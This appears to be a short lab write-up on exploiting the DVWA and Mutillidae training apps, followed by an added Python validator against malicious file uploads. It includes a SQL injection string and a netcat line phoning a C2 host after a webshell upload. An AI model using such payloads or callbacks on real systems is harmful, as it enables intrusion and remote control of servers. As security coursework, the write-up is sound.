In this lab we exploit the vulnerable systems we have installed, DVWA as well as Mutillidae.
For Mutillidae, I do a simple SQL injection attack to return the database. The string I used is "' 1=1 -- "

For DVWA, I demonstrate the seriousness of a file upload vulnerability. I uploaded a webshell I found online and ran various terminal commands, starting with ifconfig and nmap -h and ending with the logic of phoning home to the C2 server at the domain I own: nc fbiservers.com 443.
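
One mitigation for the file upload weakness described above, as an added example that is not part of the original lab or DVWA's own code: a server-side check in Python that allowlists image types, matches content to extension, and discards the client's filename. The function name, size limit and sample bytes are assumptions constructed for illustration.

```python
import os
import secrets

# Allowlisted extensions mapped to the magic bytes a real file of that type starts with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for this example

# Constructed sample inputs (not taken from the lab).
SCRIPT_SAMPLE = b"<?php echo 'constructed sample'; ?>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def validate_upload(client_name, data):
    """Return (ok, result): result is the server-chosen stored name, or a rejection reason."""
    base = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in base:
        return False, "null byte in filename"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # Rejects "shell.php.jpg", ".htaccess" and names with no extension.
        return False, "filename must be name.ext with a single extension"
    ext = "." + parts[1]
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # Never reuse the client-supplied name; store under a random one.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, body in [("shell.php", SCRIPT_SAMPLE), ("shell.php.jpg", SCRIPT_SAMPLE),
                       ("photo.png", SCRIPT_SAMPLE), ("photo.PNG", PNG_SAMPLE)]:
        print(name, validate_upload(name, body))
```

A magic-byte check can be satisfied by a file that starts with a valid image header, so the upload directory should also sit outside the web root or be configured so the server never executes anything stored in it.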